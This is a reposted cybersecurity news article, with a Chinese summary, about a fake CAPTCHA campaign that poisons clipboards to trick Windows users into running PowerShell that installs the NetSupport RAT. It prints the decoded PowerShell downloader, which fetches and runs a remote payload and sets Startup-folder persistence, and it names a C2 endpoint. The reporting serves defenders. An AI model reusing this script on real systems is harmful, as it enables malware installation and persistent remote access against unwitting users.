威胁行为者利用'验证人类身份'机制传播恶意软件
研究人员发现一个复杂恶意软件活动,利用用户对常见互联网验证过程的信任,在Windows系统中传播恶意软件。攻击者通过伪造网站(如假冒Gitcodes仓库和DocuSign页面)诱使用户执行PowerShell脚本,最终安装NetSupport远程访问木马。该活动采用多阶段攻击策略和剪贴板中毒技术,在受害者不知情的情况下传播恶意软件。 2025-6-4 13:59:6 Author: cybersecuritynews.com(查看原文) 阅读量:3 收藏

Threat Actors Exploit ‘Prove You Are Human’ Scheme To Deliver Malware

Cybersecurity researchers have uncovered a sophisticated malware campaign that weaponizes users’ trust in routine internet verification processes to deliver malicious payloads.

The scheme exploits familiar “prove you are human” prompts, transforming seemingly innocent website interactions into vectors for malware distribution across Windows systems worldwide.

The campaign employs deceptive websites that mimic legitimate services, including spoofed Gitcodes repositories and fraudulent DocuSign verification pages, to trick users into executing malicious PowerShell scripts on their machines.

Google News

Gitcodes (Source – DomainTools)

Victims are manipulated into copying and pasting these scripts directly into their Windows Run prompt, initiating a cascade of automated downloads that ultimately install the NetSupport Remote Access Trojan (RAT) on infected systems.

DomainTools analysts identified this malicious multi-stage downloader campaign targeting Windows users through carefully crafted social engineering techniques.

Attack flow (Source – DomainTools)

The researchers discovered that threat actors are leveraging multiple themed websites to host PowerShell scripts designed to bypass traditional security measures through their staged approach.

The campaign represents a significant evolution in social engineering tactics, as it requires victims to actively participate in their own compromise while believing they are completing legitimate verification procedures.

The attack infrastructure demonstrates remarkable sophistication, utilizing multiple registrars including Cloudflare, NameCheap, and NameSilo, with name servers distributed across cloudflare.com, luxhost.org, and namecheaphosting.com.

This distributed approach enhances the campaign’s resilience against takedown efforts while providing attackers with multiple fallback options for payload delivery.

Advanced Clipboard Poisoning and Infection Mechanism

The most insidious aspect of this campaign lies in its clipboard poisoning technique, particularly evident in the fake DocuSign verification pages.

Fake Docusign CAPTCHAs (Source – DomainTools)

When victims encounter these fraudulent sites, they are presented with interfaces that closely resemble legitimate Cloudflare browser checking pages mixed with DocuSign branding.

Upon clicking what appears to be a standard CAPTCHA checkbox, the malicious page triggers an “unsecuredCopyToClipboard()” function that silently copies an encoded multi-layered string to the user’s clipboard.

The copied content, initially ROT13 encoded to evade signature detection, decodes to reveal a PowerShell script designed to establish persistence and download additional payloads.

A representative example of the decoded script demonstrates the attack’s methodology:-

while ($true) {
    try {
        (New-Object Net.WebClient).DownloadFile($url, $path);
        if ((Get-Item $path).length -ge 20000) {
            Start-Process $path;
            break;
        }
    } catch {}
    Start-Sleep -Seconds 10;
}
$WScriptShell = New-Object -ComObject WScript.Shell;
$Shortcut = $WScriptShell.CreateShortcut($env:APPDATA + "\Microsoft\Windows\Start Menu\Programs\Startup\wbdims.lnk");
$Shortcut.TargetPath = $path;
$Shortcut.Save();

This script establishes a persistent download loop, automatically retrieves the “wbdims.exe” payload from GitHub, and creates a startup folder shortcut to ensure the malware executes upon each user login.

The multi-stage approach includes additional command-and-control mechanisms, with infected systems checking in via endpoints like “docusign.sa.com/verification/c.php” to signal successful compromise and trigger subsequent payload deliveries.

The campaign’s effectiveness stems from its exploitation of user familiarity with legitimate verification processes, combined with sophisticated technical implementation that segments the attack across multiple stages to evade detection and complicate attribution efforts.

Speed up and enrich threat investigations with Threat Intelligence Lookup! -> 50 trial search requests


文章来源: https://cybersecuritynews.com/threat-actors-exploit-prove-you-are-human/
如有侵权请联系:admin#unsafe.sh